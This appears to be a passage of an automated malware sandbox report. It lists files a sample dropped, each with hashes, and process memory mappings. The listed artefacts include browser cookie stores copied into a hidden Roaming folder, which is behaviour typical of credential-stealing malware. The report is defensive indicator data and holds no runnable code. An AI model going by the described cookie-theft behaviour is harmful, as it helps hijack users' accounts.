SHA512120cef4a1c322a6dd690d440119583640fdb25ae66c80e13cf5b9d54512f87e6ee63f8ae76715872d28065155b53f8d6af807305a64c0882fafe9309cccb2f98
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
d286c6e831e15fe3d9716d47fcac555d
SHA1b676212360fbe831c968cefc88180590f4405fbc
SHA2560d68af680f492b04a3f18b672629b447a1d4b0327fae53a8731ef00281eaaca1
SHA5123ee73c7e2d684aae6effafaccead81b388aa3858b2305f9500f3353dba96bd2705a59c19056df3d3309465ad20824ca5f2b0f89264e598adb3857a7bd2e49c76
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
1e21d90d6c7cdb095df7de5cbaabdd4b
SHA109d1685e917ffce8a67a910979e6f406ac18fa4a
SHA256f8fddc7410860e968936d0ed29a3b847100ce4a8e695fb834298f00423894717
SHA512d1d6c5eac63004b1c8a004b8f4e3491bfecb9adecbf3a73c0db66d362df0571a750e4e7e66a2b3dfc417f3c406ad7b3e8f7bd6f2f3d284844adb697e4d9da078
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
1e21d90d6c7cdb095df7de5cbaabdd4b
SHA109d1685e917ffce8a67a910979e6f406ac18fa4a
SHA256f8fddc7410860e968936d0ed29a3b847100ce4a8e695fb834298f00423894717
SHA512d1d6c5eac63004b1c8a004b8f4e3491bfecb9adecbf3a73c0db66d362df0571a750e4e7e66a2b3dfc417f3c406ad7b3e8f7bd6f2f3d284844adb697e4d9da078
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
4f0c66478bf5840fce6775dec494bd7e
SHA1c9857e454ae50db03f078db0a3488418b98005cb
SHA2568e01a34a99ab7a4a3f5b0775d25125c302fd5a522c7e4993b5d5e42dfcae3f72
SHA5122585ff7a9483e3734b414a4b1acb5744aa245147fa5e42a59d6eb898ef4dee80617ea2ef8b732fa15236f2c10775f3cb74674a880077fb5fb0dd0b61f93685af
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
4f0c66478bf5840fce6775dec494bd7e
SHA1c9857e454ae50db03f078db0a3488418b98005cb
SHA2568e01a34a99ab7a4a3f5b0775d25125c302fd5a522c7e4993b5d5e42dfcae3f72
SHA5122585ff7a9483e3734b414a4b1acb5744aa245147fa5e42a59d6eb898ef4dee80617ea2ef8b732fa15236f2c10775f3cb74674a880077fb5fb0dd0b61f93685af
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
9cb237b01bdc88ebc88e8c7096f4ef24
SHA18fe0f75d7d826e12b1941c996869644797f06cf6
SHA25647ccc0e567d32c7f7c4ab8a9c3528ae7b8d96669eb821db0650f1e8898905a6d
SHA512f33a5a58d92b8ce53aa15743b9663a94a17b2115e098a04ec8a6be65d5204cc25c53b7c0d9a653ab9fe93e159731c95c3d7676f767f8deb17a3e1511c783d0bf
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
9cb237b01bdc88ebc88e8c7096f4ef24
SHA18fe0f75d7d826e12b1941c996869644797f06cf6
SHA25647ccc0e567d32c7f7c4ab8a9c3528ae7b8d96669eb821db0650f1e8898905a6d
SHA512f33a5a58d92b8ce53aa15743b9663a94a17b2115e098a04ec8a6be65d5204cc25c53b7c0d9a653ab9fe93e159731c95c3d7676f767f8deb17a3e1511c783d0bf
-
C:\Users\Admin\AppData\Local\Temp\496A.binMD5
a00d540c98c51db12502f25c362fed22
SHA16606c30cca180dc29d1c2e5326fa9b5c59757a4e
SHA256136a1e18ddaeb6c8ff671157b6665524ff2d44ac79fe2e6bd94e9737f03eca61
SHA51234de0f0052bbc488f953ca86025e4fa18b8a908b2eb5d4d5b0b36a45625e5504849c5c2dba1c7e1cfae0ba2136b59d98a9a74dbe7ec2e0a85a7d5655867448ac
-
C:\Users\Admin\AppData\Local\Temp\520E.binMD5
19e6a29447ddbd3eb9027f0dbd1807fa
SHA1d3ffbce5588ee6661096b47b3d4c23be0ac3be22
SHA25659f662476955d02f44457ed8475d1706a834e794cf43256d12b1448805377690
SHA51215ac38a5a8e26788f7952d2e89ce4ef730e36e79674a92ca28a7153a5447b58e054ef3fdfa51627af3c8018378bc98dffc77f698812fdc596680a556c2383261
-
C:\Users\Admin\AppData\Local\Temp\750.bi1MD5
c4f77466fa6bb3b7b587745fd51eb73e
SHA1c9ee49b895e2cec4483b9e3d84e32f0d650edcbb
SHA25637d5f9a9a4db772e5bcc6a0211a3092049c09f438067bc36cde152e10b79eeb8
SHA51251c1ddeac48567d106cbcc5bad19b31639b73ec66d11ed83dbc90da880792df0b6bd6c6e28a712e854ceeb6bd96a3985e521cb9d666b0ccd087e96f4a90fc7d7
-
C:\Users\Admin\AppData\Local\Temp\750.bi1MD5
c4f77466fa6bb3b7b587745fd51eb73e
SHA1c9ee49b895e2cec4483b9e3d84e32f0d650edcbb
SHA25637d5f9a9a4db772e5bcc6a0211a3092049c09f438067bc36cde152e10b79eeb8
SHA51251c1ddeac48567d106cbcc5bad19b31639b73ec66d11ed83dbc90da880792df0b6bd6c6e28a712e854ceeb6bd96a3985e521cb9d666b0ccd087e96f4a90fc7d7
-
C:\Users\Admin\AppData\Local\Temp\E78E.binMD5
988409dfdd08f9da924e8549eefac10d
SHA14632e4944aed08f486ea6540b78f16f0f87d3bb4
SHA2567632f5fd94d5a8e076fe9d04a251fe93f692ab379d5921407c8a145c2fd66bf7
SHA51230d536031237748cd7c9637575360c56b1dbc68c28d9681304c97c95365760211da396a568a8439f22c7a4b1c21f4e30e293b8f2ed27125903a719180b97e4cf
-
C:\Users\Admin\AppData\Local\Temp\EBD2.binMD5
639674213e036d7dd58ffe162d94b964
SHA1f24a2c483be099a8577dc7c0ab0621c162dca176
SHA256625f690d87c1d0157b3fc5addf1cb8f1910b9522dea7eff2ca3894de0bc04cfd
SHA512102e514204a966ced6b2128ce11241baf3ee994cd9f0572d35e22be08c92b0d92edc95d14f459cbd8562490eb94ebc31706dcaa63e08c08ef81541fbb8c49c70
-
C:\Users\Admin\AppData\Local\Temp\F032.binMD5
99accf5a7fa1cc529cba0694001fc61f
SHA13ace85ebeda76c9f2ffb8b21ca037a3ce1b6e734
SHA256dd179c7187b95835f3b73b363eced6a3ad41bb0b55bb4e5d33e70c8abfa5d581
SHA512c62aeea71820ac2518e66c6b03d011ca3faa8a3dc1777e5897eb9d0c3bb7284efe4ce59b16ae0b61c076b946f7ef7540f65d675aa9d00fd5503a93e5863785c2
-
C:\Users\Admin\AppData\Local\Temp\F476.binMD5
7179e67568ebfb8fed24248e7b900f26
SHA106ad3c8683fc0f2033e27b25e9da14937754de47
SHA25687739a90fdd980605decfae242eac64034683ad0fa56d6cf5d03cc3043777c37
SHA512dda95f24f937961a3fa06aa8b59c6759dd1935c6a00b4e8d98ee82e190432d5adf437385be45ac3ca53997776d704f1910cfaf8de5e6bac8e9798a5534438353
-
C:\Users\Admin\AppData\Local\Temp\RES3A90.tmpMD5
5f5515971538b09c79dc8681cf7d42a8
SHA1a73c8a81d5303d2b42e0980c6a67325c04801c54
SHA25679106f4ab9d66d359eb918bcf6d7a585b22282cc6c77580b5eb1f9ab4cf6d8d0
SHA5123ed05e1b26856c872d8e65bdfd7a445debba469e96774437134be052fbdd159f9fcdb00674816e3ad574c4d0f39a7851a0944a00db48a2afe9ef21555cd676dd
-
C:\Users\Admin\AppData\Local\Temp\RES3B1D.tmpMD5
305e37a0bb5e86607d95dbf8c2a9e47d
SHA12d1b4a6e427a78d262a77557ba4e9aac81c5a4d5
SHA256e6a5551e1322ebca4e76e79e8d2202908e5125ba93eecae9369454cbffa2e3ec
SHA512a5d4f77fac18b3316b37229d6ec58c5196b7e17e62e402f98ad27c53e13441a6434065d75a6fb890a83803c50cd40c2634b2c281ba76a13449cfe1ca4a05ef36
-
C:\Users\Admin\AppData\Local\Temp\b2mptg01\b2mptg01.dllMD5
5228884e8bb3e51bf696ec5990078d00
SHA19ac37d495ab67a81d7cf518a2cf5d5975717cd4b
SHA256e2a35d97504ca22851660a312e9e39f643c849d7b317ba5052bfe2cd3b2dfc2f
SHA512a62ec2a95b5fd25b5005326d55e850cea46a035bab99f68862f8512ab8b15acaba33ba675e98cdf582779ef328914aa3b27935ebf4b7faa649ebadb994151ea8
-
C:\Users\Admin\AppData\Local\Temp\mhwodcsb\mhwodcsb.dllMD5
a9d7c43d69be46b170afeae940ff31da
SHA19e073c079794c4c0b48ab8af823a606ad9af934d
SHA256cf9b4a27e2a8f226b2591bf1e230ec3a05aaf04ac4b2760f034b0305e84d5578
SHA512b56a424b7664876cbbe882342825d0896517dc5e9c06533ddcd573c5c08c6129a4666821104cf6e2c7f4157f527a756e37066e62774ef97a306300fa46dbbd62
-
C:\Users\Admin\AppData\Local\Temp\setup.infMD5
77a665c63c6fff740660ba4e5812d30b
SHA11007a20b6e27c841a0eb11bce93ea26125c3d626
SHA256d70593ade7ff73f8a53b8dec8be8974a681d21cd0dc2016bda4947f1c7812f8f
SHA51213951ab4a77a2db631659ceef32cf40a669031399c3ad2f8b0bf96276bec95f9ebe3105860bfbe9ce821a052def39073a834b32b965cc3ca8601197391bbf1b0
-
C:\Users\Admin\AppData\Local\Temp\setup.rptMD5
2c77a7a4265a85523f7d1944aa6aaf86
SHA1abed6b031902cae5400d8f7a0bca9789a629e187
SHA2565fb98a132aed3c46003d11629cada5195b99fd87f2667220f31c39c4c27af689
SHA512debe78d9a247bf5c071552c4c6a754f158f8faff6ab79f78566155e052091ef1d819140073bfa6cd9258bf440339aa9fd31180335adc45132bd04672403d0868
-
C:\Users\Admin\AppData\Roaming\MICROS~1\{C2C77~1\cookie.ff\jl56y3z6.default-release\cookies.sqlite.ffMD5
89d4b62651fa5c864b12f3ea6b1521cb
SHA1570d48367b6b66ade9900a9f22d67d67a8fb2081
SHA25622f1159db346d2cc8f4fa544796cc9d243a5737110a17d8e3755a2448404ce70
SHA512e6d3109c5e2aef98a63f42eebe3b10feedb1a8c81d7823380553f84d2d6585f328c18f02e72c3e5c98ace7ffedfb6214a4ea6c87e85cefceada8e630f8df61ff
-
C:\Users\Admin\AppData\Roaming\MICROS~1\{C2C77~1\cookie.ie\AP0OAKS1.txt.ieMD5
295004231d1152ff1b16578225dc6ac8
SHA1ea58a81957e4cb05d7a29f46b72b34d519c5e7f5
SHA256fa7ef13e5d1275e6a7657f061427c92fceae04d094562abad8f819a543940733
SHA512732b0f17767db514c43ec9e9142eb476d3b37ceaa06d827489c6ebc2be528315a9cfb534bf20d84cdf4a657ba4c621c2d75daf811a525856a280bf7c0d4e9e33
-
C:\Users\Admin\AppData\Roaming\MICROS~1\{C2C77~1\cookie.ie\DWX8EZFU.txt.ieMD5
b90ea5024b06b3b4ec2a6b5b8a79ddcb
SHA1ac99025129d12e6b907fd80a411570d694479151
SHA25661c7ec6b40d05ece9fd7960c5e4705e1a98311aea32d9868c77e1c7a2214d3ad
SHA51276567774cf0b7b66099d19ad2ec95267d38ffc0cb058f3f58ffc85868c358d5f6616c7ca19454fd853fef812b563f7d586a1a3434a601cbf10e10786b34ab880
-
C:\Users\Admin\AppData\Roaming\MICROS~1\{C2C77~1\sols\macromedia.com\support\flashplayer\sys\settings.solMD5
d5e535e4b017c0c5dda171adc1d399b3
SHA1180937b58f9a60f38012f72d574925b4a5d97da4
SHA2564b4f70069e2072c81219a465ffeaface0e912569c5efbdfd2e05155def3fe971
SHA51299cf1b5a44eb9fc9357f70560f10ef11ed977733635b105f9222c728094f23b10b643fee73f7a2cea90b5709ff0b0bd24e91e3ea8986deaac439a36b8e7687a7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\DWX8EZFU.txtMD5
b90ea5024b06b3b4ec2a6b5b8a79ddcb
SHA1ac99025129d12e6b907fd80a411570d694479151
SHA25661c7ec6b40d05ece9fd7960c5e4705e1a98311aea32d9868c77e1c7a2214d3ad
SHA51276567774cf0b7b66099d19ad2ec95267d38ffc0cb058f3f58ffc85868c358d5f6616c7ca19454fd853fef812b563f7d586a1a3434a601cbf10e10786b34ab880
-
C:\Users\Admin\AppData\Roaming\Microsoft\{C2C77CC6-3964-44C0-D316-7DB8B7AA016C}\setup.infMD5
9ea203e6a5db0eac5d5e8da60f7a7919
SHA17254665dfec2b3a82d53ae5d810a4e9520409fd2
SHA2568b4a44ac2244bf00063ba21d6dab540c3ccb205ebf185c219237f230d5ffbeba
SHA512691d131184c99818f0b50700e2aab5a592e887d5f16ba310816742640ec106d2769342d9336f671daa66dd8f7465b574809335f59e877cb7f0a0ac63ecb1d913
-
C:\Users\Admin\AppData\Roaming\Microsoft\{C2C77CC6-3964-44C0-D316-7DB8B7AA016C}\setup.rptMD5
9c82e6376713fdb5a3946f2cd60b81ab
SHA163f943a54e0e398afcd3ec1c40dae958e2d2cfc8
SHA256ae9868fa8abb4159f99b978ed83b47ca59eb7d392b9e711d17fbd2162704f1a8
SHA5128b14fbbe3fd07d5de58e41956d2cf7a83d8ebdc4c4b993f04ae21b4990e9971dfbeb778fb1493e8bd2bcddc32023e932b449d71c3cdefe311dd592c9e1ab2ec1
-
\??\c:\Users\Admin\AppData\Local\Temp\b2mptg01\CSC591C21F4ECC24EE9A21A6767EAA8B54.TMPMD5
413ff34a6af3c810381dc9883b2b7f79
SHA1c3631e2c69ad50d69bf4665a5221c253e4f02271
SHA25639cf29c00735eb88e47309667df802f6645425b9df80512b14e854d26933db88
SHA512dde892c1c67ea6c8874e9dd78eb05a14bef01469b72ee1a28696933f093051d69635135b1e1893a9ecf8b5d35dc3ce13805625fcdf299da344f863635d4491ba
-
\??\c:\Users\Admin\AppData\Local\Temp\b2mptg01\b2mptg01.0.csMD5
c85ff7138c5e801a993b2414546da5e7
SHA104456d9ea3b3e2e064593777989d67c6c5416a51
SHA256d358ed68c8be2077075e457aa91f769b733e223da75f25fb2a63ccf9fd83cb8a
SHA5121a4286d9ca3680625ef5bcb4abc320cfeba6fd10cd1ae1912d6ac0b992406f7f81e7d357f986b93596f2286237ad5d5741f616db0abfdfb3b1f26b0420d2cca9
-
\??\c:\Users\Admin\AppData\Local\Temp\b2mptg01\b2mptg01.cmdlineMD5
1b95cd1d651502df31c7250bb22d543e
SHA1071fa4c25fa55367cdb39be2567e4463c1e66595
SHA256ecd54fc8a5bb49b736eee7d3609c54b7acdb3dc8e26b8338e912cf3ce3dc5412
SHA512c2b55707a2404486d5e3ff94b47ccf8b26c8d29d1341b52d24665aed308cab880046303f067444198bcf4de975dd8f9fe10585027678860d5d6852a796272aa9
-
\??\c:\Users\Admin\AppData\Local\Temp\mhwodcsb\CSC30A71AC164AD49BBB8204E57CB4BB5B.TMPMD5
ed9b9cb127b2c3ca0b408627afaefc78
SHA106f495dbf4b2843d472dc10c7576a925f67551b5
SHA2561e50d255d7a5ed3ec3b5dbab2067c7fe24ef3f25fa59f88f83536dd9c45a0bb0
SHA512e949fbdbfff05bb5c1bcf3b5cea94999ad714a6f21256cf989defb6a5e9a36fdf9c254f2809d260a5f2603222dcd60d0e01edc85da59f006ed749eabe401876d
-
\??\c:\Users\Admin\AppData\Local\Temp\mhwodcsb\mhwodcsb.0.csMD5
f397df221ca9e90d73d446b1e481ba59
SHA1363a4a9aa4d2fc304b94f374967efbb914bc0ef4
SHA2560f08d4ac6af418e1f0bb928b9d4c2d78e51d709b512e533ac6f8492b79ecc435
SHA5123ebb1163df4dfcc29a3fb56285598534487b44458afab01d83256eb59b2a051d117eb97ebc510e673720553dab8591585bf3d116da5224cdb4e91682eb4496d4
-
\??\c:\Users\Admin\AppData\Local\Temp\mhwodcsb\mhwodcsb.cmdlineMD5
76fbb40dc1dcf3ed58d114bb2e834016
SHA1aa982598f49654a941efac02a5c17f1c93af4c23
SHA256678539272c3ba6100a6b75b702d08b9a97daceeb81203f09e2ba065481874a01
SHA512d4f796ac879ed400ce2c5ba6b4963e3067198ae10010b0eab842966fe2a59901adb6aaa3588bd620c06bf2a6d9fc431c1dea07ce5b44ccd2b1a23a6d19d756dc
-
memory/516-67-0x0000000000000000-mapping.dmp
-
memory/536-90-0x0000000000000000-mapping.dmp
-
memory/644-98-0x0000000000000000-mapping.dmp
-
memory/724-84-0x0000000000000000-mapping.dmp
-
memory/724-86-0x000007FFFFFDB000-mapping.dmp
-
memory/724-135-0x0000000000000000-mapping.dmp
-
memory/924-118-0x0000000000000000-mapping.dmp
-
memory/968-92-0x0000000000000000-mapping.dmp
-
memory/1036-59-0x0000000000000000-mapping.dmp
-
memory/1104-79-0x0000000000000000-mapping.dmp
-
memory/1104-83-0x000007FFFFFD7000-mapping.dmp
-
memory/1104-85-0x0000000001C60000-0x0000000001CFB000-memory.dmpFilesize
620KB
-
memory/1152-131-0x0000000000000000-mapping.dmp
-
memory/1156-99-0x0000000000000000-mapping.dmp
-
memory/1172-123-0x0000000000000000-mapping.dmp
-
memory/1192-143-0x0000000000000000-mapping.dmp
-
memory/1200-55-0x0000000002260000-0x0000000002261000-memory.dmpFilesize
4KB
-
memory/1200-54-0x000000001AC80000-0x000000001AC81000-memory.dmpFilesize
4KB
-
memory/1200-52-0x000007FEF32F0000-0x000007FEF3CDC000-memory.dmpFilesize
9.9MB
-
memory/1200-53-0x0000000001D60000-0x0000000001D61000-memory.dmpFilesize
4KB
-
memory/1200-74-0x00000000022B0000-0x00000000022B1000-memory.dmpFilesize
4KB
-
memory/1200-56-0x0000000002290000-0x0000000002291000-memory.dmpFilesize
4KB
-
memory/1200-57-0x000000001B7B0000-0x000000001B7B1000-memory.dmpFilesize
4KB
-
memory/1200-58-0x000000001B840000-0x000000001B841000-memory.dmpFilesize
4KB
-
memory/1200-133-0x0000000000000000-mapping.dmp
-
memory/1200-66-0x0000000001C40000-0x0000000001C41000-memory.dmpFilesize
4KB
-
memory/1200-51-0x0000000000000000-mapping.dmp
-
memory/1200-75-0x000000001C950000-0x000000001C9EB000-memory.dmpFilesize
620KB
-
memory/1260-141-0x0000000000000000-mapping.dmp
-
memory/1268-80-0x0000000005EF0000-0x0000000005F8B000-memory.dmpFilesize
620KB
-
memory/1268-82-0x0000000005EF0000-0x0000000005F8B000-memory.dmpFilesize
620KB
-
memory/1344-116-0x0000000000000000-mapping.dmp
-
memory/1396-126-0x0000000000000000-mapping.dmp
-
memory/1396-87-0x0000000000000000-mapping.dmp
-
memory/1420-146-0x0000000000000000-mapping.dmp
-
memory/1484-3-0x000007FEF63D0000-0x000007FEF664A000-memory.dmpFilesize
2.5MB
-
memory/1564-136-0x0000000000000000-mapping.dmp
-
memory/1640-97-0x0000000000000000-mapping.dmp
-
memory/1640-140-0x0000000000000000-mapping.dmp
-
memory/1648-9-0x0000000000000000-mapping.dmp
-
memory/1688-128-0x0000000000000000-mapping.dmp
-
memory/1728-91-0x0000000000000000-mapping.dmp
-
memory/1736-121-0x0000000000000000-mapping.dmp
-
memory/1744-2-0x0000000006030000-0x0000000006041000-memory.dmpFilesize
68KB
-
memory/1744-49-0x0000000006130000-0x0000000006140000-memory.dmpFilesize
64KB
-
memory/1752-138-0x0000000000000000-mapping.dmp
-
memory/1756-62-0x0000000000000000-mapping.dmp
-
memory/1780-120-0x0000000000000000-mapping.dmp
-
memory/1780-130-0x0000000000000000-mapping.dmp
-
memory/1792-70-0x0000000000000000-mapping.dmp
-
memory/1816-4-0x0000000000000000-mapping.dmp
-
memory/1816-152-0x00000000060E0000-0x0000000006103000-memory.dmpFilesize
140KB
-
memory/1860-89-0x0000000000000000-mapping.dmp
-
memory/1908-100-0x0000000000000000-mapping.dmp
-
memory/1908-125-0x0000000000000000-mapping.dmp
-
memory/1916-88-0x0000000000000000-mapping.dmp